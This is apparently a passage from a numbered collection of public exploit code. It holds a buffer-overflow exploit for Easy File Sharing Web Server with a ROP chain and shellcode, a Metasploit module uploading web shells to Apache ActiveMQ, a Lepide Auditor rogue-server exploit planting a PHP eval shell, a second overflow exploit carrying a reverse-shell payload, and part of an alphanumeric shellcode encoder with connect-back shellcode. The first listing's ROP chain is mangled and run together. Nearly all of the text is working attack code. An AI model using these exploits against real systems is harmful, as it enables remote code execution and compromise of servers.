      shellcode += "\x4c\x4b\x56\x61\x78\x50\x6e\x69\x61\x54\x37\x54"
      shellcode += "\x55\x74\x53\x6b\x63\x6b\x63\x51\x32\x79\x71\x4a"
      shellcode += "\x36\x31\x69\x6f\x4b\x50\x43\x6f\x31\x4f\x73\x6a"
      shellcode += "\x6e\x6b\x36\x72\x58\x6b\x4c\x4d\x53\x6d\x52\x4a"
      shellcode += "\x47\x71\x4c\x4d\x6f\x75\x48\x32\x43\x30\x53\x30"
      shellcode += "\x67\x70\x32\x70\x31\x78\x34\x71\x4e\x6b\x32\x4f"
      shellcode += "\x6c\x47\x39\x6f\x68\x55\x4f\x4b\x4c\x30\x68\x35"
      shellcode += "\x4f\x52\x33\x66\x50\x68\x79\x36\x5a\x35\x6d\x6d"
      shellcode += "\x4d\x4d\x49\x6f\x68\x55\x55\x6c\x76\x66\x53\x4c"
      shellcode += "\x75\x5a\x6b\x30\x59\x6b\x59\x70\x72\x55\x33\x35"
      shellcode += "\x6f\x4b\x37\x37\x76\x73\x74\x32\x70\x6f\x50\x6a"
      shellcode += "\x67\x70\x50\x53\x59\x6f\x69\x45\x65\x33\x75\x31"
      shellcode += "\x62\x4c\x61\x73\x46\x4e\x75\x35\x30\x78\x72\x45"
      shellcode += "\x45\x50\x41\x41"

      def create_rop_chain():
          # rop chain generated with mona.py - www.corelan.be
          rop_gadgets = [
              # 0x00000000,  # [-] Unable to find gadget to put 00000201 into ebx
              0x10015442,  # POP EAX # RETN [ImageLoad.dll]
              0xFFFFFDFE,  # -202
              0x100231d1,  # NEG EAX # RETN [ImageLoad.dll]
              0x1001da09,  # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]| {PAGE_EXECUTE_READ}
              0x1001a858,  # RETN (ROP NOP) [ImageLoad.dll]
              0x1001a858,  # RETN (ROP NOP) [ImageLoad.dll]
              0x10015442,  # POP EAX # RETN [ImageLoad.dll]
              0x1004de84,  # &Writable location [ImageLoad.dll]
              0x10015442,  # POP EAX # RETN [ImageLoad.dll]
              0x61c832d0,  # ptr to &VirtualProtect() [IAT sqlite3.dll]
              0x1002248c,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
              0x61c0a798,  # XCHG EAX,EDI # RETN [sqlite3.dll]
              0x1001d626,  # XOR ESI,ESI # RETN [ImageLoad.dll]
              0x10021a3e,  # ADD ESI,EDI # RETN 0x00 [ImageLoad.dll]
              0x100218f9,  # POP EBP # RETN [ImageLoad.dll]
              0x61c24169,  # & push esp # ret [sqlite3.dll]
              0x10022c4c,  # XOR EDX,EDX # RETN [ImageLoad.dll]
              0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
              0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
              0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
              # the same INC EDX gadget keeps repeating from here on; the listing is cut off at this point on the page
RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x1001bd98, # POP ECX # RETN [ImageLoad.dll] 0x1004de84, # &Writable location [ImageLoad.dll] 0x61c373a4, # POP EDI # RETN [sqlite3.dll] 0x1001a858, # RETN (ROP NOP) [ImageLoad.dll] 0x10015442, # POP EAX # RETN [ImageLoad.dll] 0x90909090, # nop 0x100240c2, # PUSHAD # RETN [ImageLoad.dll] ] return ''.join(struct.pack('<I', _) for _ in rop_gadgets) rop_chain = create_rop_chain() buf = 
"A"*2278 + rop_chain + shellcode + "B"*(1794-len(shellcode)-len(rop_chain)) + ret s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((sys.argv[1], 80)) s.send("POST /sendemail.ghp HTTP/1.1\r\n\r\nEmail=" + buf + "&getPassword=Get+Password") s.close()
  16. Hacking

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ActiveMQ web shell upload',
      'Description'    => %q(
        The Fileserver web application in Apache ActiveMQ 5.x before 5.14.0
        allows remote attackers to upload and execute arbitrary files via an
        HTTP PUT followed by an HTTP MOVE request.
      ),
      'Author'         => [
        'Ian Anderson <andrsn84[at]gmail.com>',
        'Hillary Benson <1n7r1gu3[at]gmail.com>'
      ],
      'License'        => MSF_LICENSE,
      'References'     => [
        [ 'CVE', '2016-3088' ],
        [ 'URL', 'http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt' ]
      ],
      'Privileged'     => true,
      'Platform'       => %w{ java linux win },
      'Targets'        => [
        [ 'Java Universal', { 'Platform' => 'java', 'Arch' => ARCH_JAVA } ],
        [ 'Linux', { 'Platform' => 'linux', 'Arch' => ARCH_X86 } ],
        [ 'Windows', { 'Platform' => 'win', 'Arch' => ARCH_X86 } ]
      ],
      'DisclosureDate' => "Jun 01 2016",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('BasicAuthUser', [ true, 'The username to authenticate as', 'admin' ]),
        OptString.new('BasicAuthPass', [ true, 'The password for the specified username', 'admin' ]),
        OptString.new('JSP', [ false, 'JSP name to use, excluding the .jsp extension (default: random)', nil ]),
        OptString.new('AutoCleanup', [ false, 'Remove web shells after callback is received', 'true' ]),
        Opt::RPORT(8161)
      ])
    register_advanced_options(
      [
        OptString.new('UploadPath', [false, 'Custom directory into which web shells are uploaded', nil])
      ])
  end

  # JSP loader stub: loads the uploaded jar next to it and runs metasploit.Payload.main
  def jsp_text(payload_name)
    %{
    <%@ page import="java.io.*" %><%@ page import="java.net.*" %><%
    URLClassLoader cl = new java.net.URLClassLoader(new java.net.URL[]{new java.io.File(request.getRealPath("./#{payload_name}.jar")).toURI().toURL()});
    Class c = cl.loadClass("metasploit.Payload");
    c.getMethod("main",Class.forName("[Ljava.lang.String;")).invoke(null,new java.lang.Object[]{new java.lang.String[0]});
    %>}
  end

  def exploit
    jar_payload = payload.encoded_jar.pack
    payload_name = datastore['JSP'] || rand_text_alpha(8 + rand(8))
    host = "#{datastore['RHOST']}:#{datastore['RPORT']}"
    @url = datastore['SSL'] ? "https://#{host}" : "http://#{host}"
    paths = get_upload_paths
    paths.each do |path|
      if try_upload(path, jar_payload, payload_name)
        break handler if trigger_payload(payload_name)
        print_error('Unable to trigger payload')
      end
    end
  end

  def try_upload(path, jar_payload, payload_name)
    ['.jar', '.jsp'].each do |ext|
      file_name = payload_name + ext
      data = ext == '.jsp' ? jsp_text(payload_name) : jar_payload
      move_headers = { 'Destination' => "#{@url}#{path}#{file_name}" }
      upload_uri = normalize_uri('fileserver', file_name)
      print_status("Uploading #{move_headers['Destination']}")
      # casecmp returns 0 on a (case-insensitive) match, so test for zero explicitly
      register_files_for_cleanup "#{path}#{file_name}" if datastore['AutoCleanup'].casecmp('true').zero?
      return error_out unless send_request('PUT', upload_uri, 204, 'data' => data) &&
                              send_request('MOVE', upload_uri, 204, 'headers' => move_headers)
      @trigger_resource = /webapps(.*)/.match(path)[1]
    end
    true
  end

  def get_upload_paths
    base_path = "#{get_install_path}/webapps"
    custom_path = datastore['UploadPath']
    return [normalize_uri(base_path, custom_path)] unless custom_path.nil?
    [ "#{base_path}/api/", "#{base_path}/admin/" ]
  end

  def get_install_path
    properties_page = send_request('GET', "#{@url}/admin/test/systemProperties.jsp").body
    match = properties_page.tr("\n", '@').match(/activemq\.home<\/td>@\s*<td>([^@]+)<\/td>/)
    return match[1] unless match.nil?
  end

  def send_request(method, uri, expected_response = 200, opts = {})
    opts['headers'] ||= {}
    opts['headers']['Authorization'] = basic_auth(datastore['BasicAuthUser'], datastore['BasicAuthPass'])
    opts['headers']['Connection'] = 'close'
    r = send_request_cgi(
      {
        'method' => method,
        'uri' => uri
      }.merge(opts)
    )
    return false if r.nil? || expected_response != r.code.to_i
    r
  end

  def trigger_payload(payload_name)
    send_request('POST', @url + @trigger_resource + payload_name + '.jsp')
  end

  def error_out
    print_error('Upload failed')
    @trigger_resource = nil
    false
  end
end
17.

#!/usr/bin/python
"""
Lepide Auditor Suite createdb() Web Console Database Injection Remote Code Execution Vulnerability

Vendor: http://www.lepide.com/
File: lepideauditorsuite.zip
SHA1: 3c003200408add04308c04e3e0ae03b7774e4120
Download: http://www.lepide.com/lepideauditor/download.html
Analysis: https://www.offensive-security.com/vulndev/auditing-the-auditor/

Summary:
========

The application allows an attacker to specify a server where a custom protocol is implemented.
This server performs the authentication and allows an attacker to execute controlled SQL directly
against the database as root.

Additional code:
================

When I wrote this poc, I didn't combine the server and client into a single poc. So below is the client-poc.py code:

[email protected]:~# cat client-poc.py
#!/usr/bin/python
import requests
import sys

if len(sys.argv) < 3:
    print "(+) usage: %s <target> <attacker's server>" % sys.argv[0]
    sys.exit(-1)

target = sys.argv[1]
server = sys.argv[2]
s = requests.Session()
print "(+) sending auth bypass"
s.post('http://%s:7778/' % target, data = {'servername':server, 'username':'whateva','password':'thisisajoke!','submit':''}, allow_redirects=False)
print "(+) sending code execution request"
s.get('http://%s:7778/genratereports.php' % target, params = {'path':'lol','daterange':'[email protected]','id':'6'})

Example:
========

[email protected]:~# ./server-poc.py
Lepide Auditor Suite createdb() Web Console Database Injection Remote Code Execution
by mr_me 2016

(+) waiting for the target...
(+) connected by ('172.16.175.174', 50541)
(+) got a login request
(+) got a username: test
(+) got a password: hacked
(+) sending SUCCESS packet
(+) send string successful
(+) connected by ('172.16.175.174', 50542)
(+) got a login request
(+) got a username: test
(+) got a password: hacked
(+) sending SUCCESS packet
(+) send string successful
(+) got a column request
(+) got http request id: 6
(+) got http request path: lol
(+) send string successful
(+) got a filename request
(+) got http request daterange: [email protected] - 23:59:59
(+) got http request id: 6
(+) got http request path: lol
(+) successfully sent tag
(+) successfully sent file!
(+) file sent successfully
(+) done! Remote Code Execution: http://172.16.175.174:7778/offsec.php?e=phpinfo();

In another console:

[email protected]:~# ./client-poc.py 172.16.175.174 172.16.175.1
(+) sending auth bypass
(+) sending code execution request
"""

import struct
import socket
from thread import start_new_thread

LOGIN = 601
COLUMN = 604
FILENAME = 603
VALID = 2
TAGR = 4
FILEN = 5
SUCCESS = "_SUCCESS_"

def get_string(conn):
    # strings are a big-endian int32 length followed by UTF-16 data; acknowledge with VALID
    size = struct.unpack(">i", conn.recv(4))[0]
    data = conn.recv(size).decode("utf-16")
    conn.send(struct.pack(">i", VALID))
    return data

def send_string(conn, string):
    size = len(string.encode("utf-16-le"))
    conn.send(struct.pack(">i", size))
    conn.send(string.encode("utf-16-le"))
    return struct.unpack(">i", conn.recv(4))[0]

def send_tag(conn, tag):
    conn.send(struct.pack(">i", TAGR))
    conn.send(struct.pack(">i", tag))
    return struct.unpack(">i", conn.recv(4))[0]

def send_file(conn, filedata):
    if send_tag(conn, FILEN) == 2:
        print "(+) successfully sent tag"
        # send length of file
        conn.send(struct.pack(">i", len(filedata.encode("utf-16-le"))))
        # send the malicious payload
        conn.send(filedata.encode("utf-16-le"))
        if struct.unpack(">i", conn.recv(4))[0] == 2:
            print "(+) successfully sent file!"
            if send_tag(conn, VALID) == 2:
                return True
    return False

def client_thread(conn, addr):
    """ Let's put it this way, my mum's not proud of my code. """
    while True:
        data = conn.recv(4)
        if not data:
            # peer closed the connection
            break
        resp = struct.unpack(">i", data)[0]
        if resp == 4:
            code = conn.recv(resp)
            resp = struct.unpack(">i", code)[0]
            # stage 1
            if resp == LOGIN:
                print "(+) got a login request"
                # send a VALID response back
                conn.send(struct.pack(">i", VALID))
                # now we expect to get the username and password
                print "(+) got a username: %s" % get_string(conn)
                print "(+) got a password: %s" % get_string(conn)
                # now we try to send a success packet
                print "(+) sending SUCCESS packet"
                if send_string(conn, SUCCESS) == 2:
                    print "(+) send string successful"
            # stage 2
            elif resp == COLUMN:
                print "(+) got a column request"
                # send a VALID response back
                conn.send(struct.pack(">i", VALID))
                print "(+) got http request id: %s" % get_string(conn)
                print "(+) got http request path: %s" % get_string(conn)
                if send_string(conn, "foo-bar") == 2:
                    print "(+) send string successful"
            # stage 3 - this is where the exploitation is
            elif resp == FILENAME:
                print "(+) got a filename request"
                conn.send(struct.pack(">i", VALID))
                # now we read back 3 strings...
                print "(+) got http request daterange: %s" % get_string(conn)
                print "(+) got http request id: %s" % get_string(conn)
                print "(+) got http request path: %s" % get_string(conn)
                # exploit!
                if send_file(conn, "select '<?php eval($_GET[e]); ?>' into outfile '../../www/offsec.php';"):
                    print "(+) file sent successfully"
                    print "(+) done! Remote Code Execution: http://%s:7778/offsec.php?e=phpinfo();" % (addr[0])
                break
    conn.close()

HOST = '0.0.0.0'
PORT = 1056

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
s.listen(10)

print "Lepide Auditor Suite createdb() Web Console Database Injection Remote Code Execution"
print "by mr_me 2016\t\n"
print "(+) waiting for the target..."

while True:
    # blocking call, waits to accept a connection
    conn, addr = s.accept()
    print '(+) connected by %s' % (addr,)
    start_new_thread(client_thread, (conn, addr))
s.close()
18.

#!/usr/bin/python
# Exploit Title: Easy File Sharing Web Server 7.2 - GET Buffer Overflow (DEP Bypass with ROP)
# Date: 8 July 2017
# Exploit Author: Sungchul Park
# Author Contact: [email protected]
# Vendor Homepage: http://www.sharing-file.com
# Software Link: http://www.sharing-file.com/efssetup.exe
# Version: Easy File Sharing Web Server 7.2
# Tested on: Windows 7 SP1

import socket, struct

def create_rop_chain():
    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
        # For EDX -> flAllocationType(0x1000) [ EAX to EBX ]
        # 0x00000000, # [-] Unable to find gadget to put 00001000 into edx
        0x10015442,  # POP EAX # RETN [ImageLoad.dll]
        0xFFFFEFFF,  # -1001 (static value)
        0x100231d1,  # NEG EAX # RETN [ImageLoad.dll]
        0x1001614d,  # DEC EAX # RETN [ImageLoad.dll]
        0x1001da09,  # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
        0x1001a858,  # RETN (ROP NOP) [ImageLoad.dll]
        0x1001a858,  # RETN (ROP NOP) [ImageLoad.dll]
        0x10015442,  # POP EAX # RETN [ImageLoad.dll]
        0x1004de84,  # &Writable location [ImageLoad.dll]
        # For EDX -> flAllocationType(0x1000) [ EBX to EDX ]
        0x10022c4c,  # XOR EDX,EDX # RETN [ImageLoad.dll]
        0x10022c1e,  # ADD EDX,EBX # POP EBX # RETN 0x10 [ImageLoad.dll]
        0xffffffff,  # Filler (Compensation for POP EBX)
        # For ESI -> &VirtualAlloc
        0x10015442,  # POP EAX # RETN [ImageLoad.dll]
        0xffffffff,  # Filler \
        0xffffffff,  # Filler |
        0xffffffff,  # Filler | => (Compensation for RETN 0x10)
        0xffffffff,  # Filler /
        0x1004d1fc,  # ptr to &VirtualAlloc() [IAT ImageLoad.dll]
        0x1002248c,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
        0x61c0a798,  # XCHG EAX,EDI # RETN [sqlite3.dll]
        0x1001aeb4,  # POP ESI # RETN [ImageLoad.dll]
        0xffffffff,  #
        0x1001715d,  # INC ESI # ADD AL,3A # RETN [ImageLoad.dll]
        0x10021a3e,  # ADD ESI,EDI # RETN 0x00 [ImageLoad.dll]
        # For EBP -> Return Address
        0x10013860,  # POP EBP # RETN [ImageLoad.dll]
        0x61c24169,  # & push esp # ret [sqlite3.dll]
        # For EBX -> dwSize(0x01)
        0x100132ba,  # POP EBX # RETN [ImageLoad.dll]
        0xffffffff,  #
        0x61c2785d,  # INC EBX # ADD AL,83 # RETN [sqlite3.dll]
        0x1001f6da,  # INC EBX # ADD AL,83 # RETN [ImageLoad.dll]
        # For ECX -> flProtect(0x40)
        0x10019dfa,  # POP ECX # RETN [ImageLoad.dll]
        0xffffffff,  #
        0x61c68081,  # INC ECX # ADD AL,39 # RETN [sqlite3.dll]
        0x61c68081,  # INC ECX # ADD AL,39 # RETN [sqlite3.dll]
        0x61c06831,  # ADD ECX,ECX # RETN [sqlite3.dll]
        0x61c06831,  # ADD ECX,ECX # RETN [sqlite3.dll]
        0x61c06831,  # ADD ECX,ECX # RETN [sqlite3.dll]
        0x61c06831,  # ADD ECX,ECX # RETN [sqlite3.dll]
        0x61c06831,  # ADD ECX,ECX # RETN [sqlite3.dll]
        0x61c06831,  # ADD ECX,ECX # RETN [sqlite3.dll]
        # For EDI -> ROP NOP
        0x61c373a4,  # POP EDI # RETN [sqlite3.dll]
        0x1001a858,  # RETN (ROP NOP) [ImageLoad.dll]
        # For EAX -> NOP(0x90)
        0x10015442,  # POP EAX # RETN [ImageLoad.dll]
        0x90909090,  # nop
        0x100240c2,  # PUSHAD # RETN [ImageLoad.dll]
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

rop_chain = create_rop_chain()

# msfvenom -p windows/shell/reverse_tcp LHOST=192.168.44.128 LPORT=8585 -b "\x00\x3b" -e x86/shikata_ga_nai -f python -v shellcode
shellcode = "\x90"*200
shellcode += "\xdb\xdd\xbb\x5e\x78\x34\xc0\xd9\x74\x24\xf4\x5e"
shellcode += "\x29\xc9\xb1\x54\x31\x5e\x18\x03\x5e\x18\x83\xc6"
shellcode += "\x5a\x9a\xc1\x3c\x8a\xd8\x2a\xbd\x4a\xbd\xa3\x58"
shellcode += "\x7b\xfd\xd0\x29\x2b\xcd\x93\x7c\xc7\xa6\xf6\x94"
shellcode += "\x5c\xca\xde\x9b\xd5\x61\x39\x95\xe6\xda\x79\xb4"
shellcode += "\x64\x21\xae\x16\x55\xea\xa3\x57\x92\x17\x49\x05"
shellcode += "\x4b\x53\xfc\xba\xf8\x29\x3d\x30\xb2\xbc\x45\xa5"
shellcode += "\x02\xbe\x64\x78\x19\x99\xa6\x7a\xce\x91\xee\x64"
shellcode += "\x13\x9f\xb9\x1f\xe7\x6b\x38\xf6\x36\x93\x97\x37"
shellcode += "\xf7\x66\xe9\x70\x3f\x99\x9c\x88\x3c\x24\xa7\x4e"
shellcode += "\x3f\xf2\x22\x55\xe7\x71\x94\xb1\x16\x55\x43\x31"
shellcode += "\x14\x12\x07\x1d\x38\xa5\xc4\x15\x44\x2e\xeb\xf9"
shellcode += "\xcd\x74\xc8\xdd\x96\x2f\x71\x47\x72\x81\x8e\x97"
shellcode += "\xdd\x7e\x2b\xd3\xf3\x6b\x46\xbe\x9b\x58\x6b\x41"
shellcode += "\x5b\xf7\xfc\x32\x69\x58\x57\xdd\xc1\x11\x71\x1a"
shellcode += "\x26\x08\xc5\xb4\xd9\xb3\x36\x9c\x1d\xe7\x66\xb6"
shellcode += "\xb4\x88\xec\x46\x39\x5d\x98\x43\xad\x9e\xf5\x60"
shellcode += "\xad\x77\x04\x79\x8c\x0e\x81\x9f\x9e\x40\xc2\x0f"
shellcode += "\x5e\x31\xa2\xff\x36\x5b\x2d\xdf\x26\x64\xe7\x48"
shellcode += "\xcc\x8b\x5e\x20\x78\x35\xfb\xba\x19\xba\xd1\xc6"
shellcode += "\x19\x30\xd0\x37\xd7\xb1\x91\x2b\x0f\xa0\x59\xb4"
shellcode += "\xcf\x49\x5a\xde\xcb\xdb\x0d\x76\xd1\x3a\x79\xd9"
shellcode += "\x2a\x69\xf9\x1e\xd4\xec\xc8\x55\xe2\x7a\x75\x02"
shellcode += "\x0a\x6b\x75\xd2\x5c\xe1\x75\xba\x38\x51\x26\xdf"
shellcode += "\x47\x4c\x5a\x4c\xdd\x6f\x0b\x20\x76\x18\xb1\x1f"
shellcode += "\xb0\x87\x4a\x4a\xc3\xc0\xb5\x08\xe1\x68\xde\xf2"
shellcode += "\xa5\x88\x1e\x99\x25\xd9\x76\x56\x0a\xd6\xb6\x97"
shellcode += "\x81\xbf\xde\x12\x47\x0d\x7e\x22\x42\xd3\xde\x23"
shellcode += "\x60\xc8\x37\xaa\x87\xef\x37\x4c\xb4\x39\x0e\x3a"
shellcode += "\xfd\xf9\x35\x35\xb4\x5c\x1f\xdc\xb6\xf3\x5f\xf5"

host = "192.168.44.139"
port = 80

max_size = 4000
seh_offset = 57
eax_offset = 73
rop_offset = 2788

buffer = "A" * seh_offset                    # padding
buffer += "BBBB"                             # nSEH Pointer
buffer += struct.pack("<I", 0x1002280a)      # SE Handler with stack pivot (# ADD ESP,1004 # RETN [ImageLoad.dll])
buffer += "A" * (eax_offset - len(buffer))   # padding
buffer += "DDDD"                             # EAX overwrite
buffer += "C" * rop_offset
buffer += rop_chain
buffer += shellcode
buffer += "B" * (max_size - len(buffer))     # padding

# HTTP GET Request
request = "GET /vfolder.ghp HTTP/1.1\r\n"
request += "Host: " + host + "\r\n"
request += "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36" + "\r\n"
request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" + "\r\n"
request += "Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4" + "\r\n"
request += "Cookie: SESSIONID=3672; UserID=PassWD=" + buffer + "; frmUserName=; frmUserPass=;"
request += "\r\n"
request += "Connection: keep-alive" + "\r\n"
request += "If-Modified-Since: Thu, 06 Jul 2017 14:12:13 GMT" + "\r\n"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(request + "\r\n\r\n")
s.close()
19.

/*
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
Alphanumeric Shellcode Encoder Decoder
Copyright © 1985-2008 Avri Schneider - Aladdin Knowledge Systems, Inc.
All rights reserved.

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/gpl-3.0.html>.

+-----------+
WORKS CITED
+-----------+
+--------------------------------------------------------------------------------------------------+
|Matt Conover, Soren Macbeth, Avri Schneider                                       05 October 2004 |
|Encode2Alnum (polymorphic alphanumeric decoder/encoder)                                           |
|Full-Disclosure <http://lists.grok.org.uk/pipermail/full-disclosure/2004-October/027147.html>    |
|                                                                                                  |
|CLET Team.                                                                              Aug. 2003 |
|Polymorphic Shellcode Engine                                                                      |
|Phrack <http://www.phrack.org/show.php?p=61&a=9>                                                  |
|                                                                                                  |
|Ionescu, Costin.                                                                      1 July 2003 |
|Re: GetPC code (was: Shellcode from ASCII)                                                        |
|Vuln-Dev <http://www.securityfocus.com/archive/82/327348>                                         |
|                                                                                                  |
|rix.                                                                                    Aug. 2001 |
|Writing ia32 alphanumeric shellcodes                                                              |
|Phrack <http://www.phrack.org/show.php?p=57&a=15>                                                 |
|                                                                                                  |
|Wever, Berend-Jan.                                                                   28 Jan. 2001 |
|Alphanumeric GetPC code                                                                           |
|Vuln-Dev <http://www.securityfocus.com/archive/82/351528>                                         |
|ALPHA3 <http://skypher.com/wiki/index.php?title=ALPHA3>                                           |
+--------------------------------------------------------------------------------------------------+
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
*/

#include <time.h>
#include <stdio.h>
#include <windows.h>

#define MAX_BYTES 0x100
#define MAX_ENCODED_SHELLCODE 2000 //this will be allocated on the stack
#define MIN_IP_STR_LEN 7
#define MAX_IP_STR_LEN 15
#define OFFSET_XOR_AL1_A 15
#define OFFSET_XOR_AL1_B 18
#define OFFSET_XOR_AL2_A 37
#define OFFSET_XOR_AL2_B 40
#define OFFSET_PUSH_DWORD1 0
#define OFFSET_PUSH_DWORD2 1
#define OFFSET_PUSH_DWORD3 4
#define OFFSET_PUSH_DWORD4 12
#define OFFSET_RANDOMIZED_DECODER_HEAD 14
#define SIZE_RANDOMIZED_DECODER_HEAD 16

BYTE EncodedShellcode[] = // encoded 336 bytes
"PZhUQPTX5UQPTHHH4D0B8RYkA9YA3A9A2B90B9BhPTRWX5PTRW4r8B9ugxPqy8xO"
"wck4WTyhlLlUjyhukHqGCixVLt4UTCBRwsV3pRod8OLMKO9FXJVTJJbJX4gsVXAt"
"Q3ukAxFmVIw7HyBfDyNv5zXqg4PQeTxZJLm56vRjSidjSz75mHb2RL5Hl30tUmnH"
"HtXEv7oZVdiEv1QwWijcgVk4CZn7NI3uRai32AZ7FS0Iq1cwWc5T5RlnTIiKJVmq"
"4T4MElucobfP4vWyB0OfB34JRJ9T4zjLlbKmlk7jTicj11869F001uAdTZKNJ7wL"
"mOv5mLlGPKFLtNI2525WhktKDO0NIlseHIuJ33xv7xGQAW55eZKXHw78zfvCI2U0"
"9Ulw5ZZhynmxG7JZZgJAYbg1MEp5QcOv7AYkYfcHQDWVMlJnzOSh8nzg1NZZn5Px"
"11U5INVEtvZOS1E094HqmbB6K1MfRIq7KQyNOeL7NHI1Xnwhyhy69bg2bTexGnkc"
"CEt90vn3DaFxGaFuRIPg0NK40kdg0L9ImaFbGy1Wl7JyGeJByHdfRCSYzvCzVa2v"
"RtQWG5lxRMN1CZREvyKFvfwij3X2P81J1wk9ZLmGAqxGPuQv7RBX411iaWKCLGnD"
"kwRZKREaRis5V7c5ILxKfAx6MbH40T53PnX9ZwSWtYzbHwCzkS0Ev5iVmLmS3xSk"
"1telLPYuGyNvX1TyJ3yLdOwckr";

// example: make encoder choose more uppercase bytes...
#define ADDITIONAL_CHARSET "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
#define ALNUM_CHARSET ADDITIONAL_CHARSET "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" // <--- allowed charset - feel free to change - YMMV
#define REGISTER_WITH_ADDRESS_OF_SHELLCODE esp // <--- change this to the register holding the address of the decoder
#define _Q(str) #str
#define Q(str) _Q(str)
#define P(str) #str ##" // <--- buffer offset\n"## _Q(str)
#define CONNECT_BACK_SHELLCODE
//#undef CONNECT_BACK_SHELLCODE //undefine CONNECT_BACK_SHELLCODE to use your own - and place it in shellcode[] below

int main();
UCHAR *scan_str_known_pattern(UCHAR *alnum_str, UCHAR *known_pattern, UINT known_pattern_length);
UCHAR get_push_register_instruction(UCHAR *reg);
UCHAR get_random_alnum_value();
UCHAR get_random_alnum_push_dword_opcode();
UCHAR *get_nop_slide(UINT size, UINT slide);
UCHAR *slide_substr_forward(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide);
UCHAR *slide_substr_back(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide);
UCHAR *shuffle(UCHAR str[], UINT length);
DWORD my_htonl(DWORD dw_in);
DWORD ip_str_to_dw(UCHAR *str);
BOOL terminating_key_exist(UCHAR *alnum_shellcode, UCHAR *terminating_key);
BOOL is_alnum(UCHAR c);
BOOL str_is_alnum(UCHAR *str);
UCHAR get_two_xor_complemets_for_byte_and_xor(UCHAR byte, UCHAR xor, int index);
UCHAR *randomize_decoder_head(UCHAR *decoder, UINT size_decoder, UCHAR xor_al1, UCHAR jne_xor1);
struct xor2_key *get_xor2_and_key_for_xor1_and_c(UCHAR xor1, UCHAR c);
struct xor2_key *choose_random_node(struct xor2_key *head);
void free_p_xor2_key(struct xor2_key *node);

struct xor2_key {
    UCHAR xor2;
    UCHAR key;
    struct xor2_key *prev;
    struct xor2_key *next;
} xor2_key;

// Title: Win32 Reverse Connect
